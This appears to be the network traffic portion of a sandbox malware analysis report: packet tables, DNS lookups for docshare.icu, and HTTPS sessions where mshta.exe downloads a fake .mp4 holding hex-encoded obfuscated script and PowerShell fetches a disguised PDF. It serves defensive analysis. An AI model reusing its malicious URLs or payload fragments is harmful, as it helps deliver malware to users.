Feb 2, 2025 07:41:41.180774927 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.180814981 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.180819988 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.180857897 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.180857897 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.200846910 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.200865030 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.200927973 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.200938940 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.200952053 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.200984001 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.242501020 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.242539883 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.242650032 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.242665052 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.242724895 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.267121077 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.267148018 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.267250061 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.267260075 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.267333984 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.267333984 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268035889 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268060923 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268126011 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268131018 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268141985 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268199921 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268203974 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268213987 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268248081 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268294096 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268294096 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268301010 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268357038 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268557072 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268578053 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268635035 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268640995 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268652916 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268682957 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268841982 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268868923 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268908978 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268915892 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.268949986 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.268949986 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.269301891 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.269326925 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.269373894 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.269380093 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.269399881 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.269476891 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.289355993 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.289388895 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.289541006 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.289551020 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.289613962 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.331280947 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.331301928 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.331408024 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.331423044 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.331435919 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.331480980 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.331490040 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.331501961 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:41.331521988 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.331521988 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.331559896 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.332020044 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:41.332035065 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:42:09.139246941 CET	62425	53	192.168.2.8	162.159.36.2
Feb 2, 2025 07:42:09.144149065 CET	53	62425	162.159.36.2	192.168.2.8
Feb 2, 2025 07:42:09.145252943 CET	62425	53	192.168.2.8	162.159.36.2
Feb 2, 2025 07:42:09.150070906 CET	53	62425	162.159.36.2	192.168.2.8
Feb 2, 2025 07:42:09.646281004 CET	62425	53	192.168.2.8	162.159.36.2
Feb 2, 2025 07:42:09.800348997 CET	62425	53	192.168.2.8	162.159.36.2
Feb 2, 2025 07:42:09.805284977 CET	53	62425	162.159.36.2	192.168.2.8
Feb 2, 2025 07:42:09.805346966 CET	62425	53	192.168.2.8	162.159.36.2
Feb 2, 2025 07:43:42.468039036 CET	62696	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:43:42.468084097 CET	443	62696	185.208.156.80	192.168.2.8
Feb 2, 2025 07:43:42.468337059 CET	62696	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:43:42.476330996 CET	62696	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:43:42.476355076 CET	443	62696	185.208.156.80	192.168.2.8
Feb 2, 2025 07:43:43.148839951 CET	443	62696	185.208.156.80	192.168.2.8
Feb 2, 2025 07:43:43.148950100 CET	62696	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:43:43.152544022 CET	62696	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:43:43.152553082 CET	443	62696	185.208.156.80	192.168.2.8
Feb 2, 2025 07:43:43.152801037 CET	443	62696	185.208.156.80	192.168.2.8
Feb 2, 2025 07:43:43.157767057 CET	62696	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:43:43.199335098 CET	443	62696	185.208.156.80	192.168.2.8
Feb 2, 2025 07:43:43.502193928 CET	443	62696	185.208.156.80	192.168.2.8
Feb 2, 2025 07:43:43.552723885 CET	62696	443	192.168.2.8	185.208.156.80

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 2, 2025 07:41:38.681008101 CET	61415	53	192.168.2.8	1.1.1.1
Feb 2, 2025 07:41:39.022738934 CET	53	61415	1.1.1.1	192.168.2.8
Feb 2, 2025 07:42:09.138324976 CET	53	57155	162.159.36.2	192.168.2.8
Feb 2, 2025 07:42:09.828217983 CET	60069	53	192.168.2.8	1.1.1.1
Feb 2, 2025 07:42:09.835504055 CET	53	60069	1.1.1.1	192.168.2.8
Feb 2, 2025 07:43:42.407849073 CET	52922	53	192.168.2.8	1.1.1.1
Feb 2, 2025 07:43:42.458955050 CET	53	52922	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 2, 2025 07:41:38.681008101 CET	192.168.2.8	1.1.1.1	0x62b1	Standard query (0)	docshare.icu	A (IP address)	IN (0x0001)	false
Feb 2, 2025 07:42:09.828217983 CET	192.168.2.8	1.1.1.1	0xf225	Standard query (0)	241.42.69.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Feb 2, 2025 07:43:42.407849073 CET	192.168.2.8	1.1.1.1	0x9f26	Standard query (0)	docshare.icu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 2, 2025 07:41:39.022738934 CET	1.1.1.1	192.168.2.8	0x62b1	No error (0)	docshare.icu		185.208.156.80	A (IP address)	IN (0x0001)	false
Feb 2, 2025 07:42:09.835504055 CET	1.1.1.1	192.168.2.8	0xf225	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Feb 2, 2025 07:43:42.458955050 CET	1.1.1.1	192.168.2.8	0x9f26	No error (0)	docshare.icu		185.208.156.80	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

docshare.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	185.208.156.80	443	6788	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-02 06:41:39 UTC	376	OUT	GET /templates/imagesoftware/mediathek/videoanimationfloating.mp4 HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: docshare.icu Connection: Keep-Alive
2025-02-02 06:41:40 UTC	390	IN	HTTP/1.1 200 OK Connection: close content-type: video/mp4 last-modified: Sat, 01 Feb 2025 17:17:14 GMT accept-ranges: bytes content-length: 1397861 date: Sun, 02 Feb 2025 06:41:39 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 36 36 42 37 35 77 36 65 48 36 33 67 37 34 48 36 39 75 36 66 59 36 65 42 32 30 6a 34 38 48 34 63 71 35 39 6b 34 63 42 32 38 63 35 33 58 34 65 64 37 61 72 37 61 67 37 38 41 36 61 56 32 39 72 37 62 66 37 36 70 36 31 6c 37 32 72 32 30 72 35 34 68 35 39 56 37 39 68 34 62 46 36 61 59 33 64 72 32 30 50 32 37 66 32 37 58 33 62 50 36 36 4c 36 66 72 37 32 71 32 30 50 32 38 4c 37 36 4d 36 31 59 37 32 73 32 30 55 34 65 69 34 39 4c 34 31 58 34 62 62 32 30 55 33 64 73 32 30 4e 33 30 58 33 62 58 34 65 6f 34 39 57 34 31 47 34 62 57 32 30 6f 33 63 51 32 30 4e 35 33 44 34 65 54 37 61 64 37 61 6a 37 38 7a 36 61 56 32 65 57 36 63 46 36 35 48 36 65 52 36 37 41 37 34 70 36 38 6b 33 62 4a 32 30 66 34 65 47 34 39 77 34 31 52 34 62 49 32 62 66 32 62 4a 32 39 74 37 62 4e 37 36 4e Data Ascii: 66B75w6eH63g74H69u6fY6eB20j48H4cq59k4cB28c53X4ed7ar7ag78A6aV29r7bf76p61l72r20r54h59V79h4bF6aY3dr20P27f27X3bP66L6fr72q20P28L76M61Y72s20U4ei49L41X4bb20U3ds20N30X3bX4eo49W41G4bW20o3cQ20N53D4eT7ad7aj78z6aV2eW6cF65H6eR67A74p68k3bJ20f4eG49w41R4bI2bf2bJ29t7bN76N
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 34 6b 33 30 51 32 63 6a 33 36 46 33 37 50 33 37 4b 32 63 61 33 36 76 33 37 58 33 37 44 32 63 6e 33 36 79 33 39 62 33 35 6f 32 63 4f 33 36 6b 33 36 78 33 38 74 32 63 59 33 36 57 33 37 6f 33 34 6b 32 63 41 33 36 62 33 36 65 33 38 6d 32 63 6e 33 36 62 33 37 4d 33 32 6f 32 63 4f 33 37 4b 33 30 6d 33 36 48 32 63 74 33 37 65 33 31 71 33 35 41 32 63 79 33 37 41 33 32 70 33 30 64 32 63 54 33 37 4d 33 30 6c 33 33 4b 32 63 55 33 37 7a 33 35 73 33 35 48 32 63 53 33 37 61 33 31 58 33 31 5a 32 63 51 33 37 7a 33 31 51 33 36 48 32 63 62 33 37 63 33 34 57 33 30 7a 32 63 6a 33 36 6a 33 38 70 33 32 63 32 63 4d 33 37 54 33 31 75 33 39 6a 32 63 75 33 37 77 33 35 76 33 33 58 32 63 68 33 37 4b 33 33 52 33 34 6e 32 63 71 33 37 54 33 35 53 33 31 6f 32 63 69 33 37 45 33 35 56 33 Data Ascii: 4k30Q2cj36F37P37K2ca36v37X37D2cn36y39b35o2cO36k36x38t2cY36W37o34k2cA36b36e38m2cn36b37M32o2cO37K30m36H2ct37e31q35A2cy37A32p30d2cT37M30l33K2cU37z35s35H2cS37a31X31Z2cQ37z31Q36H2cb37c34W30z2cj36j38p32c2cM37T31u39j2cu37w35v33X2ch37K33R34n2cq37T35S31o2ci37E35V3
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 00 00 0d 49 00 00 02 d9 00 00 0d ee 00 00 02 a3 00 00 0f d3 00 00 03 07 00 00 14 8c 00 00 04 7f 00 00 04 67 00 00 10 95 00 00 03 ec 00 00 03 c6 00 00 0c c1 00 00 02 15 00 00 0c ec 00 00 02 5b 00 00 0d 62 00 00 02 13 00 00 0d b5 00 00 01 e3 00 00 0d 72 00 00 03 02 00 00 0c 89 00 00 02 15 00 00 0b cb 00 00 03 46 00 00 02 9e 00 00 06 ad 00 00 02 10 00 00 2e 0d 00 00 04 e0 00 00 60 e6 00 00 0b 11 00 00 00 db 00 00 06 23 00 00 00 b1 00 00 0d a3 00 00 00 61 00 00 00 7c 00 00 0b 1b 00 00 00 71 00 00 00 6a 00 00 09 da 00 00 00 cb 00 00 00 b9 00 00 08 df 00 00 00 46 00 00 00 77 00 00 0b e5 00 00 00 33 00 00 08 c1 00 00 00 47 00 00 00 48 00 00 08 45 00 00 00 3a 00 00 00 42 00 00 0a 57 00 00 00 78 00 00 00 76 00 00 08 e3 00 00 00 62 00 00 00 51 00 00 07 f1 00 00 00 Data Ascii: Ig[brF.`#a\|qjFw3GHE:BWxvbQ
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 00 00 02 39 00 00 07 31 00 00 01 f6 00 00 5a 35 00 00 0f 62 00 00 01 bf 00 00 01 ef 00 00 10 da 00 00 01 b3 00 00 0f f8 00 00 02 31 00 00 10 bd 00 00 03 0a 00 00 14 6b 00 00 04 10 00 00 03 ad 00 00 0b 25 00 00 10 1e 00 00 02 92 00 00 11 e9 00 00 02 a8 00 00 10 74 00 00 02 67 00 00 0f f4 00 00 02 89 00 00 11 10 00 00 03 68 00 00 02 b1 00 00 0e 9e 00 00 03 11 00 00 0b e1 00 00 02 85 00 00 0e bf 00 00 03 98 00 00 14 d6 00 00 03 c4 00 00 13 b8 00 00 03 b5 00 00 03 ec 00 00 0e c7 00 00 02 0b 00 00 0e 80 00 00 01 f1 00 00 0d 30 00 00 02 0f 00 00 11 80 00 00 03 6c 00 00 0e f3 00 00 01 f2 00 00 10 7c 00 00 02 4b 00 00 11 d2 00 00 02 41 00 00 11 ab 00 00 02 8e 00 00 13 fd 00 00 03 5d 00 00 03 9f 00 00 12 5b 00 00 03 60 00 00 03 15 00 00 12 7b 00 00 03 85 00 00 04 Data Ascii: 91Z5b1k%tgh0l\|KA][`{
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 00 00 0b d4 00 00 01 8b 00 00 16 fb 00 00 02 54 00 00 01 f5 00 00 0a 44 00 00 00 db 00 00 0a ed 00 00 01 81 00 00 13 76 00 00 02 58 00 00 01 a6 00 00 19 02 00 00 02 b8 00 00 01 c4 00 00 1f b5 00 00 02 5c 00 00 01 a9 00 00 1b fd 00 00 0f 46 00 00 00 96 00 00 10 80 00 00 00 ab 00 00 0e d6 00 00 00 a1 00 00 0c 42 00 00 00 a1 00 00 0f 3f 00 00 00 c2 00 00 1b 66 00 00 03 dc 00 00 04 a1 00 00 0e c3 00 00 00 d8 00 00 12 e9 00 00 01 5c 00 00 10 ec 00 00 00 b4 00 00 0f c2 00 00 00 a3 00 00 10 f1 00 00 00 c8 00 00 0d 00 00 00 00 a5 00 00 0c 13 00 00 00 c6 00 00 12 a0 00 00 00 a5 00 00 0d d9 00 00 15 22 00 00 01 03 00 00 0f 23 00 00 01 46 00 00 0b 51 00 00 00 8a 00 00 0b 88 00 00 00 af 00 00 07 16 00 00 0d fe 00 00 01 6d 00 00 0a 55 00 00 00 97 00 00 06 8f 00 00 00 Data Ascii: TDvX\FB?f\"#FQmU
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 0b 48 00 00 04 24 00 00 04 09 00 00 0a db 00 00 07 a7 00 00 04 57 00 00 0a f8 00 00 04 a2 00 00 04 17 00 00 06 39 00 00 09 bf 00 00 03 6a 00 00 0c 5d 00 00 04 c9 00 00 05 18 00 00 09 26 00 00 03 95 00 00 08 be 00 00 03 54 00 00 0a e8 00 00 09 2b 00 00 04 18 00 00 0c 2e 00 00 05 19 00 00 04 6c 00 00 0b 62 00 00 04 ba 00 00 0c 24 00 00 05 b5 00 00 05 34 00 00 0a fb 00 00 04 d6 00 00 04 b6 00 00 0a 6a 00 00 04 da 00 00 10 9e 00 00 0b 97 00 00 04 11 00 00 03 87 00 00 0c 29 00 00 03 e8 00 00 03 c1 00 00 0a fe 00 00 04 12 00 00 04 0d 00 00 0a 75 00 00 03 73 00 00 0b 29 00 00 04 ca 00 00 09 44 00 00 08 a3 00 00 03 1b 00 00 08 f4 00 00 03 82 00 00 0a 6f 00 00 03 ff 00 00 04 08 00 00 08 cd 00 00 03 b5 00 00 0b 24 00 00 05 11 00 00 05 49 00 00 0a 47 00 00 04 90 00 Data Ascii: H$W9j]&T+.lb$4j)us)Do$IG
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 01 ed 00 00 06 cd 00 00 01 21 00 00 05 02 00 00 07 73 00 00 01 03 00 00 09 e3 00 00 00 bf 00 00 09 01 00 00 00 96 00 00 03 26 00 00 02 d1 00 00 02 95 00 00 01 ef 00 00 01 60 00 00 01 a4 00 00 01 38 00 00 00 af 00 00 00 7a 00 00 01 01 00 00 3b 90 00 00 03 06 00 00 05 6e 00 00 06 7d 00 00 06 39 00 00 07 f1 00 00 0e 72 00 00 01 ce 00 00 06 4b 00 00 09 64 00 00 01 70 00 00 0e 33 00 00 06 cf 00 00 0a bc 00 00 02 7d 00 00 0b 95 00 00 01 f9 00 00 0c 8e 00 00 01 a2 00 00 01 51 00 00 08 c2 00 00 00 f8 00 00 10 12 00 00 01 bc 00 00 06 91 00 00 0f 00 00 00 01 ce 00 00 0d 23 00 00 01 1f 00 00 01 1e 00 00 0b ac 00 00 01 1a 00 00 01 01 00 00 0c 51 00 00 01 5b 00 00 08 55 00 00 0e d3 00 00 01 53 00 00 05 a8 00 00 0c c8 00 00 00 bc 00 00 00 b1 00 00 0d 3f 00 00 01 06 00 Data Ascii: !s&`8z;n}9rKdp3}Q#Q[US?
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 0a f8 00 00 01 a5 00 00 0d 24 00 00 02 db 00 00 0e 8f 00 00 02 06 00 00 09 d4 00 00 00 ee 00 00 0a 2f 00 00 01 29 00 00 0a e6 00 00 01 88 00 00 0b f7 00 00 01 d0 00 00 0d db 00 00 02 be 00 00 0b 57 00 00 01 4a 00 00 09 57 00 00 01 23 00 00 0a d3 00 00 01 7d 00 00 0e b2 00 00 02 8b 00 00 02 8e 00 00 09 a2 00 00 0c 9f 00 00 01 9e 00 00 09 bc 00 00 01 4f 00 00 0b 2d 00 00 01 c0 00 00 0c 80 00 00 02 0d 00 00 0b e1 00 00 02 3b 00 00 0d 05 00 00 09 15 00 00 01 7c 00 00 07 29 00 00 00 f8 00 00 08 2c 00 00 01 ba 00 00 08 7c 00 00 02 58 00 00 36 a8 00 00 12 ab 00 00 03 db 00 00 03 e3 00 00 0d 2c 00 00 02 26 00 00 0e f7 00 00 03 fc 00 00 03 47 00 00 0f 9f 00 00 06 2e 00 00 04 bf 00 00 0c a3 00 00 02 7a 00 00 0c ce 00 00 05 63 00 00 05 1c 00 00 0d 45 00 00 05 77 00 Data Ascii: $/)WJW#}O-;\|),\|X6,&G.zcEw
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 0b 5e 00 00 03 39 00 00 0e c6 00 00 06 58 00 00 09 73 00 00 0c 30 00 00 03 23 00 00 0c dd 00 00 02 e6 00 00 0d ae 00 00 03 38 00 00 0c 9d 00 00 03 10 00 00 0e 59 00 00 02 af 00 00 0d 5f 00 00 03 66 00 00 0d 3c 00 00 02 f5 00 00 0d 0e 00 00 03 26 00 00 0e 69 00 00 03 57 00 00 0e 91 00 00 03 68 00 00 0d b1 00 00 03 0b 00 00 0d 7e 00 00 02 d8 00 00 0d bb 00 00 03 07 00 00 0d 28 00 00 02 fe 00 00 0f d9 00 00 03 da 00 00 03 f2 00 00 0d 33 00 00 02 ba 00 00 0c 2f 00 00 03 6e 00 00 0e e3 00 00 09 84 00 00 0d 87 00 00 02 d5 00 00 0c 3f 00 00 02 65 00 00 0d 22 00 00 02 d2 00 00 0c d5 00 00 02 c3 00 00 0c 1c 00 00 02 6d 00 00 0d 07 00 00 03 52 00 00 0c e4 00 00 02 d4 00 00 0d 84 00 00 03 19 00 00 0d 59 00 00 03 66 00 00 0f db 00 00 03 03 00 00 0c 2b 00 00 03 08 00 Data Ascii: ^9Xs0#8Y_f<&iWh~(3/n?e"mRYf+
2025-02-02 06:41:40 UTC	16384	IN	Data Raw: 00 01 f4 00 00 0e 3e 00 00 01 91 00 00 0e dd 00 00 02 15 00 00 0d fc 00 00 01 4f 00 00 0e 67 00 00 01 a7 00 00 0d 6d 00 00 02 2d 00 00 0c 17 00 00 01 78 00 00 0c e8 00 00 02 31 00 00 0f e0 00 00 0a c5 00 00 01 4e 00 00 09 55 00 00 01 6d 00 00 06 aa 00 00 01 ee 00 00 30 c1 00 00 07 5f 00 00 00 9b 00 00 00 d0 00 00 08 fe 00 00 00 d3 00 00 00 eb 00 00 08 fe 00 00 00 e5 00 00 00 de 00 00 08 13 00 00 01 0c 00 00 01 86 00 00 0e 36 00 00 01 f6 00 00 01 4a 00 00 08 5e 00 00 01 18 00 00 01 05 00 00 09 79 00 00 01 29 00 00 01 2b 00 00 08 f3 00 00 01 64 00 00 01 37 00 00 07 9d 00 00 01 5f 00 00 01 3f 00 00 05 7e 00 00 00 bb 00 00 06 62 00 00 00 de 00 00 13 3a 00 00 07 71 00 00 00 e3 00 00 0a 3f 00 00 01 20 00 00 01 24 00 00 0b 60 00 00 01 14 00 00 00 e6 00 00 09 e0 Data Ascii: >Ogm-x1NUm0_6J^y)+d7_?~b:q? $`

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.8	62696	185.208.156.80	443

Timestamp	Bytes transferred	Direction	Data
2025-02-02 06:43:43 UTC	205	OUT	GET /templates/imagesoftware/ImportantInformation.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: docshare.icu Connection: Keep-Alive
2025-02-02 06:43:43 UTC	395	IN	HTTP/1.1 200 OK Connection: close content-type: application/pdf last-modified: Thu, 30 Jan 2025 12:34:12 GMT accept-ranges: bytes content-length: 558929 date: Sun, 02 Feb 2025 06:43:43 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: 7f 8f f9 d0 e1 fc 26 3f c8 d1 e9 54 58 7d e4 8b ab 16 1e ab 52 b9 30 07 e9 6a 06 62 2e 1a bf ad aa b9 7e 8c b6 a4 cb 7e 75 b5 d3 ce 33 b7 59 de ce 78 8a 21 31 bb 28 1b 25 2f 7d 54 4a 3c 01 f4 f6 80 80 ac 25 4c 2b 9a 02 ff 69 35 b7 c2 13 85 3b 9e a6 6d 59 cf 88 7f ff 05 d3 49 42 d5 3e 38 55 bf e5 7b 0c 10 15 0e 10 7f 43 c7 42 57 4d 7d f5 f3 ea 4f c3 72 ce c2 77 a2 0c b9 77 4a f2 cd 09 d7 48 15 e8 5e 24 f8 dd 67 c0 1f be 0d 9d b4 00 87 03 c3 fa d2 86 72 74 92 2b eb dd 1e b9 e7 f5 02 fd de 60 21 d7 3e 89 97 5e 48 a4 fb fc a5 83 00 69 7d d2 ef ef 46 82 1b 32 5f 39 eb 47 2f ed 44 0e 4e 66 e5 8c ef 7c eb 37 21 e6 33 c6 69 34 30 e7 06 1f d6 4d a2 f2 7f 02 2b 6b 49 5b 59 8e 69 a7 f4 4f 34 e3 cb 1f 1b ec 06 4e b3 6f 83 e3 57 89 03 2d d7 a5 1f 56 a7 4b c2 f1 a7 1b Data Ascii: &?TX}R0jb.~~u3Yx!1(%/}TJ<%L+i5;mYIB>8U{CBWM}OrwwJH^$grt+`!>^Hi}F2_9G/DNf\|7!3i40M+kI[YiO4NoW-VK
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: 0b 40 38 4b 4d d3 8e 35 40 63 07 30 35 41 81 e9 8c 60 b7 42 c0 dd 44 c2 a6 b6 df ed 08 8a 71 14 ca aa 5f 18 7e ee 4e be 52 55 ee 87 97 70 70 24 d1 28 67 91 06 ac 54 ac 62 33 9a 6b bd 0c 7f 88 b7 df a0 35 cd ef f4 1f 45 e3 a6 dc 53 17 01 25 40 68 b6 46 14 0a f3 77 3d 8d e3 fb 9a 63 83 51 42 24 87 0f 14 7b 2f 59 5e d6 36 b2 ee 37 d7 2e 9f 8e 74 b4 98 68 2b d6 f6 0f d1 90 72 55 e2 b4 79 69 c4 8d e4 f3 e7 43 ca 1d f6 b8 54 ce e6 f4 5c 5b a8 f5 c3 d4 cb b9 e3 9d 4a 55 f2 2c 0a 6c 96 cf f9 7b c3 e1 be 8d fe b5 45 52 84 2b 46 e0 87 ee d6 4a c3 a2 04 a6 3f 4f fc 31 7b 07 9e 12 d6 98 8d 99 79 4c 27 77 01 6c c9 85 98 10 66 1f fe 3d 6a c2 df 6f 68 1e be 65 50 39 6c ee 4b 43 86 d9 dd ff 25 04 76 26 71 40 ac 09 50 13 29 4f 50 93 11 2f 02 7a 4e c0 df 9e fa 4c 8d 46 90 Data Ascii: @8KM5@c05A`BDq_~NRUpp$(gTb3k5ES%@hFw=cQB${/Y^67.th+rUyiCT\[JU,l{ER+FJ?O1{yL'wlf=joheP9lKC%v&q@P)OP/zNLF
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: b4 79 b2 9b 44 71 26 56 ac 88 07 bc 0c eb 22 8e 8e 50 bc 23 af 7b 85 9e 8a 89 0c 70 00 45 f9 b4 be ab 50 02 1d 76 59 ca ff 60 87 0c 4b aa 9a d9 fa 57 fd a9 d3 82 48 5e 0c 54 ce 0c 99 c8 c1 58 74 12 5b 91 89 b4 5c 88 15 e3 94 61 8d 2f 3a 88 86 38 32 5a bb 7a b8 c7 ce 87 d4 68 4f 95 c0 c3 a8 1c 55 31 d0 b1 b9 e6 95 4e 47 22 7d 82 aa 04 ba dc 5e 75 57 17 3d 26 9f 11 8e ee a7 4f b2 4f 6b 08 80 3c ba 3a 22 4f 88 6a 72 05 ec 1c 09 a7 f9 68 1c 50 7f 5a 76 1e 6c 05 0d 13 55 c0 63 c0 c9 e4 fd 83 1e 1f d3 a6 89 45 ac 76 62 b6 1d 5b 1e 3a ac 9e 94 22 bd 00 28 cb 14 7d 8c 77 3e 56 5b 3b d9 79 5b ad 20 e5 f2 cc 5b 54 83 79 b0 a1 b3 5c 40 47 7f fe 48 a7 ca 5c 24 57 d4 63 ad 30 9e 86 aa fa 34 ca df 26 97 3b 7b 1a b4 2b bc 67 87 fd af 06 fc f7 ae c6 54 d3 1d 29 36 ca 59 Data Ascii: yDq&V"P#{pEPvY`KWH^TXt[\a/:82ZzhOU1NG"}^uW=&OOk<:"OjrhPZvlUcEvb[:"(}w>V[;y[ [Ty\@GH\$Wc04&;{+gT)6Y
